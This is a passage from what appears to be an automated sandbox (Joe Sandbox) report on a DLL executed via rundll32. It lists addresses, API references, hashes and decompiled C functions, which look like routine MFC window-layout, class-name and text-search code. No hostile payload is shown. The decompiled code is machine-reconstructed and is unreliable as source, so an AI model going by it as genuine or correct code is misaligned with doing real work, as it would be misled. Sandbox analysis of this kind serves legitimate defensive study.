                                                                                                        0x10012f97
                                                                                                        0x10012f97
                                                                                                        0x10012f9a
                                                                                                        0x10012f9a
                                                                                                        0x10012f9f
                                                                                                        0x10012fa2
                                                                                                        0x10012fa7
                                                                                                        0x10012fab
                                                                                                        0x10012fab
                                                                                                        0x10012fb1
                                                                                                        0x10012fb4
                                                                                                        0x10012fb9
                                                                                                        0x10012d3d
                                                                                                        0x10012d19
                                                                                                        0x10012fbe
                                                                                                        0x10012fd3
                                                                                                        0x10012fe0
                                                                                                        0x10012feb
                                                                                                        0x10012ff8
                                                                                                        0x10012ffd
                                                                                                        0x10013002
                                                                                                        0x10013004
                                                                                                        0x10013004
                                                                                                        0x10013007
                                                                                                        0x10013009
                                                                                                        0x1001300f
                                                                                                        0x10013011
                                                                                                        0x10013011
                                                                                                        0x10013014
                                                                                                        0x1001301d

                                                                                                        APIs
                                                                                                        • SetRectEmpty.USER32(?), ref: 10012FBE
                                                                                                          • Part of subcall function 1000775D: _malloc.LIBCMT ref: 10007777
                                                                                                        • GetWindowRect.USER32 ref: 10012F4A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Rect$EmptyWindow_malloc
                                                                                                        • String ID: @
                                                                                                        • API String ID: 299164714-2766056989
                                                                                                        • Opcode ID: b4f2a1e80a4947264ace7f911f217cbcede9b01d498dcd89d55b1c24db883c5a
                                                                                                        • Instruction ID: fedc43d79cfd6302519751773159230c9bd7cf31ca5bab4897a4d92c273d7bf2
                                                                                                        • Opcode Fuzzy Hash: b4f2a1e80a4947264ace7f911f217cbcede9b01d498dcd89d55b1c24db883c5a
                                                                                                        • Instruction Fuzzy Hash: 1CC12AB1900219AFCF45CFA8C884AEEB7F5FF48354F118569E815AB251DB34ED91CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 97%
                                                                                                        			E10032C01(void* __ecx) {
                                                                                                        				int _v8;
                                                                                                        				char _v12;
                                                                                                        				intOrPtr _v16;
                                                                                                        				char _v20;
                                                                                                        				intOrPtr _v24;
                                                                                                        				char _v28;
                                                                                                        				struct tagRECT _v44;
                                                                                                        				intOrPtr _v48;
                                                                                                        				intOrPtr _v52;
                                                                                                        				intOrPtr _v56;
                                                                                                        				void* _v60;
                                                                                                        				intOrPtr _v72;
                                                                                                        				intOrPtr _v76;
                                                                                                        				signed int _v80;
                                                                                                        				intOrPtr _v84;
                                                                                                        				char _v88;
                                                                                                        				void* __ebx;
                                                                                                        				void* __ebp;
                                                                                                        				void* _t51;
                                                                                                        				void* _t55;
                                                                                                        				int _t65;
                                                                                                        				long _t75;
                                                                                                        				void* _t78;
                                                                                                        				intOrPtr _t79;
                                                                                                        				char _t96;
                                                                                                        				void* _t98;
                                                                                                        				void* _t101;
                                                                                                        				void* _t102;
                                                                                                        
                                                                                                        				_t82 = __ecx;
                                                                                                        				_t101 = __ecx;
                                                                                                        				if( *((intOrPtr*)(__ecx + 0x84)) != 0) {
                                                                                                        					return _t51;
                                                                                                        				}
                                                                                                        				_push(_t78);
                                                                                                        				 *((intOrPtr*)(__ecx + 0x84)) = 1;
                                                                                                        				_v8 = 1;
                                                                                                        				_t55 = E1000E5E5(_t78, _t82, _t102, GetParent( *(__ecx + 0x20)));
                                                                                                        				if(_t55 == 0) {
                                                                                                        					L4:
                                                                                                        					__eflags = E10032ACB(_t101, __eflags,  &_v28,  &_v20);
                                                                                                        					if(__eflags != 0) {
                                                                                                        						_t79 = _v24;
                                                                                                        						_t96 = _v28;
                                                                                                        						L10:
                                                                                                        						E10032B46(_t101, _t105, _t96, _t79,  &_v12,  &(_v44.right),  &_v28, _v8);
                                                                                                        						if(_v12 != 0) {
                                                                                                        							_t79 = _t79 - _v16;
                                                                                                        						}
                                                                                                        						if(_v8 != 0) {
                                                                                                        							_t96 = _t96 - _v20;
                                                                                                        						}
                                                                                                        						E10032310(_t101, _v28, _v24);
                                                                                                        						_v80 = _v80 & 0x00000000;
                                                                                                        						_v84 = 3;
                                                                                                        						E1000D3E6(_t101, 0, _v12);
                                                                                                        						if(_v12 == 0) {
                                                                                                        							_t98 = 1;
                                                                                                        							__eflags = 1;
                                                                                                        						} else {
                                                                                                        							_v72 = _t96;
                                                                                                        							_v76 =  *((intOrPtr*)(_t101 + 0x68)) - 1;
                                                                                                        							_t98 = 1;
                                                                                                        							if(E1000C6FC(_t101, 0,  &_v88, 1) == 0) {
                                                                                                        								E1000D381(_t101, _t72, _t72, _v44.right, 1);
                                                                                                        							}
                                                                                                        						}
                                                                                                        						_t65 = E1000D3E6(_t101, _t98, _v8);
                                                                                                        						if(_v8 != 0) {
                                                                                                        							_v76 =  *((intOrPtr*)(_t101 + 0x6c)) - 1;
                                                                                                        							_v72 = _t79;
                                                                                                        							_t65 = E1000C6FC(_t101, _t98,  &_v88, _t98);
                                                                                                        							if(_t65 == 0) {
                                                                                                        								_t65 = E1000D381(_t101, _t98, _t65, _v44.bottom, _t98);
                                                                                                        							}
                                                                                                        						}
                                                                                                        						 *(_t101 + 0x84) =  *(_t101 + 0x84) & 0x00000000;
                                                                                                        						L22:
                                                                                                        						return _t65;
                                                                                                        					}
                                                                                                        					_t65 = GetClientRect( *(_t101 + 0x20),  &_v44);
                                                                                                        					__eflags = _v44.right;
                                                                                                        					if(_v44.right > 0) {
                                                                                                        						__eflags = _v44.bottom;
                                                                                                        						if(_v44.bottom > 0) {
                                                                                                        							_t65 = E1000D3E6(_t101, 3, 0);
                                                                                                        						}
                                                                                                        					}
                                                                                                        					 *(_t101 + 0x84) = 0;
                                                                                                        					goto L22;
                                                                                                        				}
                                                                                                        				_t75 = SendMessageA( *(_t55 + 0x20), 0x368, 0,  &_v60);
                                                                                                        				_t105 = _t75;
                                                                                                        				if(_t75 == 0) {
                                                                                                        					goto L4;
                                                                                                        				} else {
                                                                                                        					_v8 = 0;
                                                                                                        					E10032362(_t101,  &_v20);
                                                                                                        					_t96 = _v52 - _v60;
                                                                                                        					_t79 = _v48 - _v56;
                                                                                                        					goto L10;
                                                                                                        				}
                                                                                                        			}
































                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClientMessageParentRectSend
                                                                                                        • String ID: n^t
                                                                                                        • API String ID: 608431981-440804003
                                                                                                        • Opcode ID: edca38ee4daf4d32e397a9c3fe17542a360bd420c8b760836e10350a7ab14dc2
                                                                                                        • Instruction ID: 443011a122fd189d430746ca9be63dcae140343e3e0312724a30a64fc2b8da9e
                                                                                                        • Opcode Fuzzy Hash: edca38ee4daf4d32e397a9c3fe17542a360bd420c8b760836e10350a7ab14dc2
                                                                                                        • Instruction Fuzzy Hash: FE416C71900209AFDF22DBA5CD85BEFBBFDFF88741F10041AE502A6190DB746A41DB61
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 75%
                                                                                                        			E10010FB1(void* __ecx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                        				intOrPtr _v8;
                                                                                                        				intOrPtr _v12;
                                                                                                        				intOrPtr _v16;
                                                                                                        				intOrPtr _v20;
                                                                                                        				intOrPtr _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				intOrPtr _v36;
                                                                                                        				intOrPtr _v40;
                                                                                                        				intOrPtr _v44;
                                                                                                        				char _v48;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				intOrPtr* _t33;
                                                                                                        				intOrPtr* _t35;
                                                                                                        				intOrPtr* _t36;
                                                                                                        				void* _t38;
                                                                                                        				intOrPtr* _t52;
                                                                                                        				void* _t54;
                                                                                                        				intOrPtr _t55;
                                                                                                        				void* _t58;
                                                                                                        				void* _t60;
                                                                                                        				intOrPtr _t62;
                                                                                                        
                                                                                                        				_t62 = E1000A5E4(_t54, _t58, _t60, __eflags) + 0x7c;
                                                                                                        				_t55 =  *((intOrPtr*)(E1000AB19(_t54, _t58, _t62, __eflags) + 8));
                                                                                                        				if(_a8 != 0 || _a12 != 0) {
                                                                                                        					L4:
                                                                                                        					_v8 =  *((intOrPtr*)(E1003F256(__eflags)));
                                                                                                        					_t33 = E1003F256(__eflags);
                                                                                                        					_push(_a16);
                                                                                                        					 *_t33 = 0;
                                                                                                        					_push(_a12);
                                                                                                        					_push(_a8);
                                                                                                        					_push(_a4);
                                                                                                        					E1003F3EF(_t62, 0x60, 0x5f, "Afx:%p:%x:%p:%p:%p", _t55);
                                                                                                        					goto L5;
                                                                                                        				} else {
                                                                                                        					_t69 = _a16;
                                                                                                        					if(_a16 != 0) {
                                                                                                        						goto L4;
                                                                                                        					}
                                                                                                        					_v8 =  *((intOrPtr*)(E1003F256(_t69)));
                                                                                                        					_t52 = E1003F256(_t69);
                                                                                                        					_push(_a4);
                                                                                                        					 *_t52 = 0;
                                                                                                        					E1003F3EF(_t62, 0x60, 0x5f, "Afx:%p:%x", _t55);
                                                                                                        					L5:
                                                                                                        					_t35 = E1003F256(_t69);
                                                                                                        					_t70 =  *_t35;
                                                                                                        					if( *_t35 == 0) {
                                                                                                        						_t36 = E1003F256(__eflags);
                                                                                                        						_t57 = _v8;
                                                                                                        						 *_t36 = _v8;
                                                                                                        					} else {
                                                                                                        						E1000B122( *((intOrPtr*)(E1003F256(_t70))));
                                                                                                        						_pop(_t57);
                                                                                                        					}
                                                                                                        					_push( &_v48);
                                                                                                        					_push(_t62);
                                                                                                        					_push(_t55);
                                                                                                        					_t38 = E1000CCF9(_t55, _t57, 0, _t62, _t70);
                                                                                                        					_t71 = _t38;
                                                                                                        					if(_t38 == 0) {
                                                                                                        						_v48 = _a4;
                                                                                                        						_v44 = DefWindowProcA;
                                                                                                        						_v28 = _a16;
                                                                                                        						_v24 = _a8;
                                                                                                        						_v20 = _a12;
                                                                                                        						_push( &_v48);
                                                                                                        						_v36 = 0;
                                                                                                        						_v40 = 0;
                                                                                                        						_v32 = _t55;
                                                                                                        						_v16 = 0;
                                                                                                        						_v12 = _t62;
                                                                                                        						if(E10010F23(_t55, _t57, 0, _t62, _t71) == 0) {
                                                                                                        							E100088D4(_t57);
                                                                                                        						}
                                                                                                        					}
                                                                                                        					return _t62;
                                                                                                        				}
                                                                                                        			}


                                                                                                        APIs
                                                                                                        • __snprintf_s.LIBCMT ref: 10010FFC
                                                                                                          • Part of subcall function 1003F3EF: __vsnprintf_s_l.LIBCMT ref: 1003F404
                                                                                                        • __snprintf_s.LIBCMT ref: 1001102E
                                                                                                          • Part of subcall function 1003F256: __getptd_noexit.LIBCMT ref: 1003F256
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __snprintf_s$__getptd_noexit__vsnprintf_s_l
                                                                                                        • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
                                                                                                        • API String ID: 3029210900-2801496823
                                                                                                        • Opcode ID: 5649b6c3fc595f8de9b54fd5a9d14c7ac0767ff9b9488a97d961d9b60dfa58b7
                                                                                                        • Instruction ID: 62eb787467dfbfed1e776d3be6af62b76ee006de1766c75f4a903abd02d015b0
                                                                                                        • Opcode Fuzzy Hash: 5649b6c3fc595f8de9b54fd5a9d14c7ac0767ff9b9488a97d961d9b60dfa58b7
                                                                                                        • Instruction Fuzzy Hash: 94317E79D00249EFCB12DFA5CC419DEBBF4EF4D291F10402AF948AB211E774AA90CB61
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 65%
                                                                                                        			E1004B82F() {
                                                                                                        				signed long long _v12;
                                                                                                        				signed int _v20;
                                                                                                        				signed long long _v28;
                                                                                                        				signed char _t8;
                                                                                                        
                                                                                                        				_t8 = GetModuleHandleA("KERNEL32");
                                                                                                        				if(_t8 == 0) {
                                                                                                        					L6:
                                                                                                        					_v20 =  *0x10061368;
                                                                                                        					_v28 =  *0x10061360;
                                                                                                        					asm("fsubr qword [ebp-0x18]");
                                                                                                        					_v12 = _v28 / _v20 * _v20;
                                                                                                        					asm("fld1");
                                                                                                        					asm("fcomp qword [ebp-0x8]");
                                                                                                        					asm("fnstsw ax");
                                                                                                        					if((_t8 & 0x00000005) != 0) {
                                                                                                        						return 0;
                                                                                                        					} else {
                                                                                                        						return 1;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                                                        					if(__eax == 0) {
                                                                                                        						goto L6;
                                                                                                        					} else {
                                                                                                        						_push(0);
                                                                                                        						return __eax;
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}








                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,100402A0), ref: 1004B834
                                                                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1004B844
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                        • API String ID: 1646373207-3105848591
                                                                                                        • Opcode ID: 6fd5b1e6e5e231411b8e5ec4c18e2a8ba07fe27e6e182b1817c66669470078e4
                                                                                                        • Instruction ID: cd7ee7ee09c593951a5dcc08be1000c81f41c3732454af204898220ff2b93d79
                                                                                                        • Opcode Fuzzy Hash: 6fd5b1e6e5e231411b8e5ec4c18e2a8ba07fe27e6e182b1817c66669470078e4
                                                                                                        • Instruction Fuzzy Hash: F5F05430A00A19E2EF006FA1AC4E3AE7BB9FB81745F9205A4D696F00C4DF7082B4D385
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 87%
                                                                                                        			E1001FF7F(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				intOrPtr _t90;
                                                                                                        				intOrPtr* _t93;
                                                                                                        				intOrPtr _t96;
                                                                                                        				intOrPtr _t97;
                                                                                                        				void* _t100;
                                                                                                        				intOrPtr _t103;
                                                                                                        				intOrPtr _t110;
                                                                                                        				intOrPtr _t112;
                                                                                                        				intOrPtr _t114;
                                                                                                        				void* _t121;
                                                                                                        				intOrPtr* _t123;
                                                                                                        				intOrPtr* _t125;
                                                                                                        				intOrPtr _t130;
                                                                                                        				int _t131;
                                                                                                        				intOrPtr _t139;
                                                                                                        				CHAR* _t146;
                                                                                                        				intOrPtr _t155;
                                                                                                        				intOrPtr* _t158;
                                                                                                        				intOrPtr* _t160;
                                                                                                        				intOrPtr _t161;
                                                                                                        				intOrPtr* _t164;
                                                                                                        				intOrPtr* _t165;
                                                                                                        				void* _t166;
                                                                                                        				void* _t167;
                                                                                                        				void* _t169;
                                                                                                        
                                                                                                        				_push(0x1c);
                                                                                                        				E1003EE82(0x10054bd7, __ebx, __edi, __esi);
                                                                                                        				_t130 = __ecx;
                                                                                                        				 *((intOrPtr*)(_t169 - 0x14)) = __ecx;
                                                                                                        				 *((intOrPtr*)(_t169 - 0x1c)) = E1001F715(__ecx);
                                                                                                        				SendMessageA( *(_t130 + 0x20), 0xb0, _t169 - 0x20, _t169 - 0x28);
                                                                                                        				_t164 =  *(_t169 - 0x20);
                                                                                                        				_t90 = (0 |  *((intOrPtr*)(_t169 + 0xc)) != 0x00000000) + (0 |  *((intOrPtr*)(_t169 + 0xc)) != 0x00000000) - 1;
                                                                                                        				 *((intOrPtr*)(_t169 - 0x10)) = _t90;
                                                                                                        				if(_t164 != 0 || _t90 >= 0) {
                                                                                                        					E10007B48( *((intOrPtr*)(E1000AB19(_t130, 0, _t164, __eflags) + 4)));
                                                                                                        					 *(_t169 - 4) = 0;
                                                                                                        					_t93 = E1001F665(_t130, 0);
                                                                                                        					__eflags =  *((intOrPtr*)(_t169 - 0x10));
                                                                                                        					_t158 = _t93;
                                                                                                        					 *((intOrPtr*)(_t169 - 0x24)) = _t158;
                                                                                                        					if( *((intOrPtr*)(_t169 - 0x10)) >= 0) {
                                                                                                        						__eflags =  *(_t169 - 0x20) -  *(_t169 - 0x28);
                                                                                                        						if(__eflags != 0) {
                                                                                                        							_t123 = E1001FD2C(_t130, _t130, _t155, _t158, _t164, __eflags,  *(_t169 + 8),  *((intOrPtr*)(_t169 + 0x10)));
                                                                                                        							__eflags = _t123;
                                                                                                        							if(_t123 != 0) {
                                                                                                        								_t125 = E1003F562( *((char*)(_t158 + _t164)));
                                                                                                        								__eflags = _t125;
                                                                                                        								if(_t125 != 0) {
                                                                                                        									_t164 = _t164 + 1;
                                                                                                        									__eflags = _t164;
                                                                                                        								}
                                                                                                        								_t164 = _t164 +  *((intOrPtr*)(_t169 - 0x10));
                                                                                                        								__eflags = _t164;
                                                                                                        							}
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						_t164 = E1003F60C(_t158, _t158 + _t164) - _t158;
                                                                                                        					}
                                                                                                        					_t131 = lstrlenA( *(_t169 + 8));
                                                                                                        					_t96 =  *((intOrPtr*)(_t169 - 0x1c));
                                                                                                        					_t27 = _t164 - 1; // -1
                                                                                                        					__eflags = _t131 + _t27 - _t96;
                                                                                                        					if(_t131 + _t27 < _t96) {
                                                                                                        						L18:
                                                                                                        						_t155 = lstrcmpA;
                                                                                                        						_t165 = _t164 + _t158;
                                                                                                        						__eflags =  *((intOrPtr*)(_t169 + 0x10));
                                                                                                        						if( *((intOrPtr*)(_t169 + 0x10)) == 0) {
                                                                                                        							_t155 = lstrcmpiA;
                                                                                                        						}
                                                                                                        						__eflags =  *0x100991a0; // 0x0
                                                                                                        						 *((intOrPtr*)(_t169 - 0x1c)) = _t155;
                                                                                                        						if(__eflags == 0) {
                                                                                                        							__eflags =  *((intOrPtr*)(_t169 - 0x10));
                                                                                                        							if( *((intOrPtr*)(_t169 - 0x10)) >= 0) {
                                                                                                        								_t158 = _t158 - _t165 - _t131;
                                                                                                        								__eflags = _t158;
                                                                                                        								_t67 = _t96 + 1; // 0x1
                                                                                                        								_t97 = _t158 + _t67;
                                                                                                        								 *((intOrPtr*)(_t169 + 0xc)) = _t97;
                                                                                                        							} else {
                                                                                                        								_t97 = _t165 - _t158 + 1;
                                                                                                        								 *((intOrPtr*)(_t169 + 0xc)) = _t97;
                                                                                                        							}
                                                                                                        							__eflags = _t97;
                                                                                                        							if(_t97 <= 0) {
                                                                                                        								L45:
                                                                                                        								E1001F6ED( *((intOrPtr*)(_t169 - 0x14)), _t158);
                                                                                                        								goto L46;
                                                                                                        							} else {
                                                                                                        								while(1) {
                                                                                                        									_t158 = _t165 + _t131;
                                                                                                        									 *((char*)(_t169 + 0x13)) =  *_t158;
                                                                                                        									 *_t158 = 0;
                                                                                                        									_t103 =  *((intOrPtr*)(_t169 - 0x1c))(_t165,  *(_t169 + 8));
                                                                                                        									__eflags = _t103;
                                                                                                        									_t139 =  *((intOrPtr*)(_t169 + 0x13));
                                                                                                        									 *_t158 = _t139;
                                                                                                        									if(_t103 == 0) {
                                                                                                        										break;
                                                                                                        									}
                                                                                                        									 *((intOrPtr*)(_t169 + 0xc)) =  *((intOrPtr*)(_t169 + 0xc)) - 1;
                                                                                                        									_t165 = _t165 +  *((intOrPtr*)(_t169 - 0x10));
                                                                                                        									__eflags =  *((intOrPtr*)(_t169 + 0xc));
                                                                                                        									 *_t158 = _t139;
                                                                                                        									if( *((intOrPtr*)(_t169 + 0xc)) > 0) {
                                                                                                        										continue;
                                                                                                        									}
                                                                                                        									goto L45;
                                                                                                        								}
                                                                                                        								E1001F6ED( *((intOrPtr*)(_t169 - 0x14)), _t158);
                                                                                                        								_t167 = _t165 -  *((intOrPtr*)(_t169 - 0x24));
                                                                                                        								_push(0);
                                                                                                        								_push(_t167 + _t131);
                                                                                                        								_push(_t167);
                                                                                                        								goto L38;
                                                                                                        							}
                                                                                                        						} else {
                                                                                                        							__eflags =  *((intOrPtr*)(_t169 - 0x10));
                                                                                                        							if( *((intOrPtr*)(_t169 - 0x10)) <= 0) {
                                                                                                        								 *((intOrPtr*)(_t169 - 0x18)) = _t165;
                                                                                                        								_t165 = _t158;
                                                                                                        							} else {
                                                                                                        								_t39 = _t96 + 1; // 0x1
                                                                                                        								 *((intOrPtr*)(_t169 - 0x18)) = _t158 - _t131 + _t39;
                                                                                                        							}
                                                                                                        							_t160 = 0;
                                                                                                        							while(1) {
                                                                                                        								__eflags = _t165 -  *((intOrPtr*)(_t169 - 0x18));
                                                                                                        								if(_t165 >  *((intOrPtr*)(_t169 - 0x18))) {
                                                                                                        									break;
                                                                                                        								}
                                                                                                        								__eflags =  *((intOrPtr*)(_t169 + 0x10));
                                                                                                        								if( *((intOrPtr*)(_t169 + 0x10)) == 0) {
                                                                                                        									L32:
                                                                                                        									 *((char*)(_t169 + 0xf)) =  *((intOrPtr*)(_t165 + _t131));
                                                                                                        									 *((char*)(_t165 + _t131)) = 0;
                                                                                                        									_t110 =  *((intOrPtr*)(_t169 - 0x1c))(_t165,  *(_t169 + 8));
                                                                                                        									__eflags = _t110;
                                                                                                        									 *((char*)(_t165 + _t131)) =  *((intOrPtr*)(_t169 + 0xf));
                                                                                                        									if(_t110 != 0) {
                                                                                                        										L34:
                                                                                                        										_t165 = E1003F61F(_t155, _t160, _t165);
                                                                                                        										continue;
                                                                                                        									}
                                                                                                        									__eflags =  *((intOrPtr*)(_t169 - 0x10)) - _t110;
                                                                                                        									_t160 = _t165;
                                                                                                        									if( *((intOrPtr*)(_t169 - 0x10)) > _t110) {
                                                                                                        										break;
                                                                                                        									}
                                                                                                        									goto L34;
                                                                                                        								}
                                                                                                        								_t112 =  *_t165;
                                                                                                        								__eflags = _t112 -  *( *(_t169 + 8));
                                                                                                        								if(_t112 !=  *( *(_t169 + 8))) {
                                                                                                        									goto L34;
                                                                                                        								}
                                                                                                        								_t114 = E1003F562(_t112);
                                                                                                        								__eflags = _t114;
                                                                                                        								if(_t114 == 0) {
                                                                                                        									goto L32;
                                                                                                        								}
                                                                                                        								_t146 =  *(_t169 + 8);
                                                                                                        								__eflags =  *((intOrPtr*)(_t165 + 1)) - _t146[1];
                                                                                                        								if( *((intOrPtr*)(_t165 + 1)) != _t146[1]) {
                                                                                                        									goto L34;
                                                                                                        								}
                                                                                                        								goto L32;
                                                                                                        							}
                                                                                                        							E1001F6ED( *((intOrPtr*)(_t169 - 0x14)), _t160);
                                                                                                        							__eflags = _t160;
                                                                                                        							if(__eflags == 0) {
                                                                                                        								L46:
                                                                                                        								_t166 = 0;
                                                                                                        								goto L25;
                                                                                                        							}
                                                                                                        							_t161 = _t160 -  *((intOrPtr*)(_t169 - 0x24));
                                                                                                        							__eflags = _t161;
                                                                                                        							_push(0);
                                                                                                        							_push(_t161 + _t131);
                                                                                                        							_push(_t161);
                                                                                                        							L38:
                                                                                                        							E10004030( *((intOrPtr*)(_t169 - 0x14)));
                                                                                                        							_t166 = 1;
                                                                                                        							goto L25;
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						_t166 = 0;
                                                                                                        						__eflags =  *((intOrPtr*)(_t169 - 0x10));
                                                                                                        						if( *((intOrPtr*)(_t169 - 0x10)) >= 0) {
                                                                                                        							L24:
                                                                                                        							E1001F6ED( *((intOrPtr*)(_t169 - 0x14)), _t158);
                                                                                                        							L25:
                                                                                                        							 *(_t169 - 4) =  *(_t169 - 4) | 0xffffffff;
                                                                                                        							E10004B10(_t169 + 0xb, _t155, __eflags);
                                                                                                        							_t100 = _t166;
                                                                                                        							goto L3;
                                                                                                        						}
                                                                                                        						__eflags = _t96 - _t131;
                                                                                                        						if(_t96 < _t131) {
                                                                                                        							goto L24;
                                                                                                        						}
                                                                                                        						__eflags =  *0x100991a0 - _t166; // 0x0
                                                                                                        						_t164 = _t96;
                                                                                                        						if(__eflags == 0) {
                                                                                                        							_t164 = _t164 - _t131;
                                                                                                        							goto L18;
                                                                                                        						}
                                                                                                        						__eflags = _t131;
                                                                                                        						 *((intOrPtr*)(_t169 + 0xc)) = _t131;
                                                                                                        						if(_t131 == 0) {
                                                                                                        							goto L18;
                                                                                                        						} else {
                                                                                                        							goto L16;
                                                                                                        						}
                                                                                                        						do {
                                                                                                        							L16:
                                                                                                        							 *((intOrPtr*)(_t169 + 0xc)) =  *((intOrPtr*)(_t169 + 0xc)) - 1;
                                                                                                        							_t121 = E1003F60C(_t158, _t158 + _t164);
                                                                                                        							__eflags =  *((intOrPtr*)(_t169 + 0xc));
                                                                                                        							_t164 = _t121 - _t158;
                                                                                                        						} while ( *((intOrPtr*)(_t169 + 0xc)) != 0);
                                                                                                        						_t96 =  *((intOrPtr*)(_t169 - 0x1c));
                                                                                                        						goto L18;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_t100 = 0;
                                                                                                        					L3:
                                                                                                        					return E1003EF21(_t100);
                                                                                                        				}
                                                                                                        			}




























                                                                                                        0x1002006e
                                                                                                        0x10020075
                                                                                                        0x1002007b
                                                                                                        0x1002007b
                                                                                                        0x1002007f
                                                                                                        0x00000000
                                                                                                        0x1002007f
                                                                                                        0x1001ffca
                                                                                                        0x1001ffca
                                                                                                        0x1001ffcc
                                                                                                        0x1001ffd1
                                                                                                        0x1001ffd1

                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 1001FF86
                                                                                                          • Part of subcall function 1001F715: lstrlenA.KERNEL32(00000000,00000000,?,1001F871,00000000,?,?), ref: 1001F71F
                                                                                                        • SendMessageA.USER32 ref: 1001FFA8
                                                                                                        • lstrlenA.KERNEL32(?), ref: 10020037
                                                                                                        • __mbsinc.LIBCMT ref: 10020129
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$H_prolog3MessageSend__mbsinc
                                                                                                        • String ID:
